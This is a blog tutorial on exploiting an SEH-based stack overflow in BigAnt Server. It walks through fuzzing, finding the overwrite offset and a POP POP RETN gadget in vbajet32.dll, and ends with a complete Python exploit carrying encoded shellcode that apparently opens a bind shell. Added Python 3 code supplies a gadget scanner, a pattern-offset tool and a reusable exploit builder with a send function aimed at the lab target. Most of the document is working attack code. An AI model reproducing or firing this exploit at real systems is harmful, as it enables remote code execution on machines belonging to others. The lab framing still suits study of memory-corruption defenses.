Sunday, 07 October 2012

EXPLOIT BIGANT SERVER (SEH PROTECTION)

Hello everyone, today I will discuss how to exploit BigAnt Server on a system where the process is protected by SEH and SafeSEH.
Structured Exception Handling (SEH) is the Windows mechanism through which a program registers handlers for exceptions raised by hardware (for example an access violation) or by software. The handler records live on the stack, which is why a stack overflow can overwrite them. SafeSEH is the linker option (/SafeSEH) that makes the OS check a handler address against the module's registered handler table before calling it, so the handler address we plant has to come from a module built without it.

Ok, let's begin

1. Install BigAnt Server and OllyDbg on Windows.
Run BigAnt Server, open OllyDbg and attach to the AntServer process.

2. Next, prepare the fuzzer to attack BigAnt Server

#!/usr/bin/python
# Python 2 fuzzer: send an oversized "USV " command to the BigAnt server

import socket

target_address = "192.168.43.128"
target_port = 6660

# "USV " command, 2500 bytes of "A" (0x41), and the CRLF CRLF terminator
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

3. Run the fuzzer and look at OllyDbg









The application has crashed; we successfully sent the garbage data.
To pass the exception on to the program, press Shift+F9.









The EIP value has changed to 41414141.
To see the data in the application's memory, right-click on the stack row > Follow in Dump,
and the memory dump window will show the data from our buffer in memory.













There are several ways to get around the SEH protection, and the most popular is the POP, POP, RETN method. It works because, when the handler is called, the address 8 bytes up the stack (ESP+8) points at the overwritten SEH record itself, so two POPs followed by RETN send execution into the 4-byte next-SEH (nSEH) field that we also control.
*You can find and learn that method in other articles.

4. Then look for a springboard address
We are looking for an address that holds the instructions POP, POP, RETN; that address will be used to overwrite the SEH handler address in the application.

I will look for the address in a module that was not compiled with the /SafeSEH option and does not have IMAGE_DLLCHARACTERISTICS_NO_SEH set.
*You can check this using msfpescan on BackTrack.

Here I use vbajet32.dll.

In OllyDbg: View - Executable Modules, double-click vbajet32.dll.
Once in the CPU window of vbajet32.dll, right-click - Search for - Sequence of commands
and type POP r32, POP r32, RETN as in the picture below
















We find the address in vbajet32.dll: 0F9A196A.
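The search above is done by hand in OllyDbg. The following is an added example (Python 3, not code from the original post) that does the same scan over a module's raw bytes: it reports every POP r32 / POP r32 / RETN (or RETN imm16) sequence as a virtual address, skips sequences that POP into ESP, and flags addresses that contain protocol bad characters. The byte blob and the base address 0x0F9A0000 are constructed for the example; this is not vbajet32.dll, and the scan says nothing about SafeSEH, which still has to be checked with msfpescan or a similar tool.

```python
# Added example, not part of the original post: scan a module's raw bytes for
# POP r32 / POP r32 / RETN, the "springboard" the post locates by hand with
# OllyDbg's "Search for -> Sequence of commands". IMAGE is a constructed byte
# blob and BASE is a hypothetical load address, not vbajet32.dll.
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
POP_OPCODES = set(range(0x58, 0x60))   # 58..5F = pop eax .. pop edi
POP_ESP = 0x5C


def find_pop_pop_ret(image, base, skip_esp=True):
    """Return [(virtual address, mnemonic)] for each pop/pop/ret[n imm16] in image."""
    hits = []
    for off in range(len(image) - 2):
        b0, b1, b2 = image[off], image[off + 1], image[off + 2]
        if b0 not in POP_OPCODES or b1 not in POP_OPCODES:
            continue
        if skip_esp and POP_ESP in (b0, b1):
            continue   # pop esp moves the stack pointer away from nSEH
        text = "pop %s; pop %s" % (REG32[b0 - 0x58], REG32[b1 - 0x58])
        if b2 == 0xC3:                                  # retn
            hits.append((base + off, text + "; retn"))
        elif b2 == 0xC2 and off + 5 <= len(image):      # retn imm16
            imm = struct.unpack_from("<H", image, off + 3)[0]
            hits.append((base + off, text + "; retn %d" % imm))
    return hits


def bad_chars_in_address(addr, bad=b"\x00\x0a\x0d"):
    """Bytes of the little-endian address that the protocol would mangle."""
    return bytes(b for b in struct.pack("<I", addr) if b in bad)


# Constructed test image (hypothetical base 0x0F9A0000):
#   nops, "pop esi; pop ebp; retn", nops, "pop esp; pop ebx; retn", "pop eax; pop ecx; retn 8"
IMAGE = (b"\x90" * 8 + b"\x5e\x5d\xc3" + b"\x90" * 4 + b"\x5c\x5b\xc3"
         + b"\x58\x59\xc2\x08\x00")
BASE = 0x0F9A0000

if __name__ == "__main__":
    for va, text in find_pop_pop_ret(IMAGE, BASE):
        flag = bad_chars_in_address(va)
        print("0x%08X  %s%s" % (va, text, "  (bad chars!)" if flag else ""))
```

A real module would be read with `open(path, "rb").read()` and its preferred image base taken from the PE header; file offsets and virtual addresses only line up as simply as here when the section you scan is mapped without a gap, so always confirm the final address in the debugger as the post does.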

5. Finding the offset at which SEH is overwritten
I generate a cyclic pattern of 2500 bytes and put it in the fuzzer in place of the "A"s











After adding the pattern to the fuzzer, run the fuzzer and look at OllyDbg


*Every time you run the fuzzer, you need to restart OllyDbg and BigAnt

Press Shift+F9 to pass the exception to the SEH handler, and you will see the following



















Record the value from the EIP register and check it using pattern_offset.



Conclusion: the SEH handler is overwritten by the 4 bytes found 966 bytes into the pattern (counted after "USV "); the 4 bytes before that, at offset 962, are the next-SEH pointer (nSEH).
Change the fuzzer so that the handler is hit exactly at offset 966.
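For readers without Metasploit at hand, here is an added example (Python 3, not the post's code) that reproduces what pattern_create and pattern_offset do: it builds the same Aa0Aa1... cyclic pattern and turns the 32-bit value OllyDbg shows in EIP back into a pattern offset. The EIP value 42326742 used below is computed from the pattern for offset 966 and is an illustration, not the value from the post's screenshot.

```python
# Added example, not part of the original post: a pure-Python stand-in for
# Metasploit's pattern_create.rb / pattern_offset.rb, which the post uses to
# find that the SEH handler sits 966 bytes into the pattern.
import string
import struct


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2...: every 4-byte window is unique up to 20280 bytes."""
    if length > 20280:
        raise ValueError("pattern would repeat beyond 20280 bytes")
    triples = (u + l + d for u in string.ascii_uppercase
               for l in string.ascii_lowercase
               for d in string.digits)
    return "".join(triples)[:length]


def pattern_offset(eip_value, length=2500):
    """Offset in the pattern of the 4 bytes that ended up in EIP.

    OllyDbg shows EIP as a 32-bit number; x86 is little-endian, so the value
    0x42326742 was built from the bytes 42 67 32 42 = 'Bg2B' in memory order.
    """
    if isinstance(eip_value, str):
        eip_value = int(eip_value, 16)
    needle = struct.pack("<I", eip_value).decode("latin-1")
    offset = pattern_create(length).find(needle)
    if offset < 0:
        raise ValueError("%r is not in the pattern" % needle)
    return offset


def seh_layout(handler_offset):
    """The 4 bytes before the handler are the next-SEH pointer (nSEH)."""
    return {"nseh": handler_offset - 4, "seh": handler_offset}


if __name__ == "__main__":
    print(pattern_offset("42326742"))   # 966
    print(seh_layout(966))              # {'nseh': 962, 'seh': 966}
```

If `pattern_offset` raises, the register did not contain pattern bytes at all (for example the crash overwrote EIP through a different path), which is the cue to look at the SEH chain window rather than EIP.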

buffer = "USV "
buffer += "\x90" * 962                  # filler up to the next-SEH pointer (nSEH)
buffer += "\xcc\xcc\xcc\xcc"            # nSEH, offset 962 after "USV "
buffer += "\x41\x41\x41\x41"            # SEH handler, offset 966 after "USV "
buffer += "\x90" * (2504 - len(buffer)) # pad to the original 2504-byte length
buffer += "\r\n\r\n"



Here I set the four bytes just before the SEH handler address (the nSEH field) to \xcc, while the handler itself is overwritten with \x41.

Restart OllyDbg and BigAnt Server, then run the fuzzer once again.
Pass the exception to the handler by pressing Shift+F9











The \x41 bytes from our buffer have landed in the SEH handler. So far everything is going according to expectations.

6. Control the CPU
Add the vbajet32.dll address (0F9A196A) to the buffer, written in little-endian byte order


buffer = "USV "
buffer += "\x90" * 962                  # filler up to nSEH
buffer += "\xcc\xcc\xcc\xcc"            # nSEH (offset 962)
buffer += "\x6A\x19\x9A\x0f"            # SEH handler = 0F9A196A in little-endian byte order
buffer += "\x90" * (2504 - len(buffer)) # pad to 2504 bytes
buffer += "\r\n\r\n"


Before running the fuzzer, set a breakpoint on the POP POP RETN address (0F9A196A) in OllyDbg.
Restart OllyDbg and BigAnt Server, then run the fuzzer once again.

















The process stops at the breakpoint just as execution reaches the SEH handler address. Then press Shift+F9






Now look for space to store the payload.

Right-click on the first address - Follow in Dump - Selection













There is a large empty area there. After POP POP RETN, execution lands in the 4-byte nSEH field, and from there a short jump of 6 bytes is needed to skip over the handler address and reach the stack space where the shellcode will be placed.
Then generate the shellcode and avoid the bad characters.

*You can read about this in the book HARMLESS HACKING by MADA R. PERDANA or in other articles.

Final exploit

#!/usr/bin/python
# Python 2 exploit: SEH overwrite in the BigAnt Server "USV " command

import socket

target_address = "192.168.43.128"
target_port = 6660

buffer = "USV "
buffer += "\x90" * 962            # filler up to nSEH (offset 962 after "USV ")
buffer += "\xeb\x06\x90\x90"      # nSEH: JMP SHORT +6 (over the 2 NOPs and the 4-byte handler), NOP padding
buffer += "\x6A\x19\x9A\x0f"      # SEH handler: 0F9A196A (POP POP RETN in vbajet32.dll), little-endian
buffer += "\x90" * 16             # NOP padding before the shellcode
buffer+= ("\xda\xd6\xd9\x74\x24\xf4\xbb\xc7\xa4\xea\x06\x33\xc9\xb1\x51\x5f"
"\x31\x5f\x17\x83\xc7\x04\x03\x98\xb7\x08\xf3\xda\xd2\x27\xb1\xca"
"\xda\x47\xb5\xf5\x7d\x33\x26\x2d\x5a\xc8\xf2\x11\x29\xb2\xf9\x11"
"\x2c\xa4\x89\xae\x36\xb1\xd1\x10\x46\x2e\xa4\xdb\x7c\x3b\x36\x35"
"\x4d\xfb\xa0\x65\x2a\x3b\xa6\x72\xf2\x76\x4a\x7d\x36\x6d\xa1\x46"
"\xe2\x56\x62\xcd\xef\x1c\x2d\x09\xf1\xc9\xb4\xda\xfd\x46\xb2\x83"
"\xe1\x59\x2f\x38\x36\xd1\x26\x52\x62\xf9\x59\x69\x5b\xda\xfe\xe6"
"\xdf\xec\x75\xb8\xd3\x87\xfa\x24\x41\x1c\xba\x5c\xc7\x4b\xb5\x12"
"\xf9\x67\x99\x55\xd3\x1e\x49\xcf\xb4\xed\x5f\x67\x32\x61\x92\x28"
"\xe8\x7a\x02\xbe\xdb\x68\x5f\x05\x8c\x8d\x76\x26\xa5\x97\x11\x59"
"\x58\x5f\xdc\x0c\xc9\x62\x1f\x7e\x65\xba\xd6\x8b\xdb\x6b\x16\xa5"
"\x77\xc7\xbb\x1a\x2b\xa4\x68\xdf\x98\xd5\x5f\xb9\x76\x3b\x3c\x23"
"\xd4\xb2\x5d\x3e\xb2\x60\x87\x30\x84\x3e\x47\x66\x60\xd1\xe6\xd3"
"\x8a\x01\x60\x7f\xd9\x8c\x98\x28\xdd\x07\x09\x83\xde\x78\xc6\xce"
"\x68\xff\x5e\x47\x94\x29\x30\x33\x3e\x83\x4e\x6b\x2d\x43\x56\xf2"
"\x94\xed\xcf\xfb\xcf\x5b\x0f\xd3\x96\x09\x8b\xb5\x3e\xad\x3e\xb0"
"\x5a\x5b\x91\x9b\x8d\x50\x98\xfc\xa4\x2c\x12\xe0\x08\x6d\xd7\x4e"
"\x94\x2f\x35\x70\x2b\x9c\xd6\x01\xd6\xe4\x73\xb2\x8c\x7d\xf6\x3a"
"\x61\x6b\x09\xb7\xc2\x6b\x23\x6c\x9c\xc1\x9d\xc3\x73\x8c\x1c\xb2"
"\x22\x05\x4e\xcb\x15\xcd\xdd\xea\x93\xc0\x4d\xf3\x4a\xb6\x8e\xf4"
"\x44\xb8\xa1\x81\xfc\xba\xc1\x51\x66\xbc\x10\x0b\x98\x92\xf5\xd5"
"\xbe\xf1\x75\x7a\xc0\x20\x86\xac")
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()

Run BigAnt Server without OllyDbg, run the exploit, then telnet to the target IP.
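The final exploit above hard-codes every field by hand. As an added example (Python 3, not the post's code), the builder below assembles the same layout from its parts (filler, nSEH = JMP SHORT, handler address, NOP sled, shellcode) and adds the two checks that silently break exploits of this shape: bad characters in the shellcode or in the handler address, and a payload that no longer fits in the buffer. The offsets (962/966), the handler address 0F9A196A and the 2504-byte buffer are the post's; the bad-character set is an assumption, and the INT3 shellcode is a constructed placeholder, not the post's bind shell.

```python
# Added example, not part of the original post: Python 3 builder for the post's
# SEH-overwrite layout, with bad-character and size checks. BAD_CHARS is an
# assumption; the placeholder shellcode is constructed for the example.
import socket
import struct

BAD_CHARS = b"\x00\x0a\x0d"   # assumption: NUL and CRLF terminate the "USV " command


def bad_chars_in(data, bad=BAD_CHARS):
    """Set of byte values from `bad` that occur in data (empty set means clean)."""
    return set(data) & set(bad)


def jmp_short(rel8):
    """EB xx: jump rel8 bytes relative to the end of this 2-byte instruction."""
    if not -128 <= rel8 <= 127:
        raise ValueError("short jump out of range")
    return b"\xeb" + struct.pack("<b", rel8)


def build_seh_exploit(nseh_offset, handler_addr, shellcode,
                      total=2504, prefix=b"USV ", sled=16, bad=BAD_CHARS):
    """Return the full request: prefix + buffer padded to `total` bytes + CRLF CRLF."""
    handler = struct.pack("<I", handler_addr)      # little-endian, as the post writes it by hand
    for name, blob in (("handler address", handler), ("shellcode", shellcode)):
        found = bad_chars_in(blob, bad)
        if found:
            raise ValueError("%s contains bad chars: %s" % (name, sorted(found)))
    # nSEH: jump over the 2 NOPs that pad the jump plus the 4-byte handler (2 + 4 = 6)
    nseh = jmp_short(2 + len(handler)) + b"\x90\x90"
    buf = prefix + b"\x90" * nseh_offset + nseh + handler + b"\x90" * sled + shellcode
    if len(buf) > total:
        raise ValueError("payload is %d bytes over the %d-byte buffer" % (len(buf) - total, total))
    buf += b"\x90" * (total - len(buf))
    return buf + b"\r\n\r\n"


def layout(nseh_offset, prefix=b"USV ", sled=16):
    """Absolute offsets of each field in the request, for comparison with the dump window."""
    nseh = len(prefix) + nseh_offset
    return {"nseh": nseh, "seh": nseh + 4, "sled": nseh + 8, "shellcode": nseh + 8 + sled}


def send_exploit(host, port, payload):
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)


if __name__ == "__main__":
    placeholder = b"\xcc" * 8   # constructed: INT3s stand in for real shellcode
    payload = build_seh_exploit(962, 0x0F9A196A, placeholder)
    print(layout(962), len(payload))
    # send_exploit("192.168.43.128", 6660, payload)   # target from the post; uncomment to fire
```

With a debugger attached, the INT3 placeholder is a convenient first payload: a break at offset 990 of the request proves the jump chain works before the real shellcode goes in, and a ValueError from the size check tells you that the shellcode plus sled has outgrown the 2504-byte buffer.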






CMIIW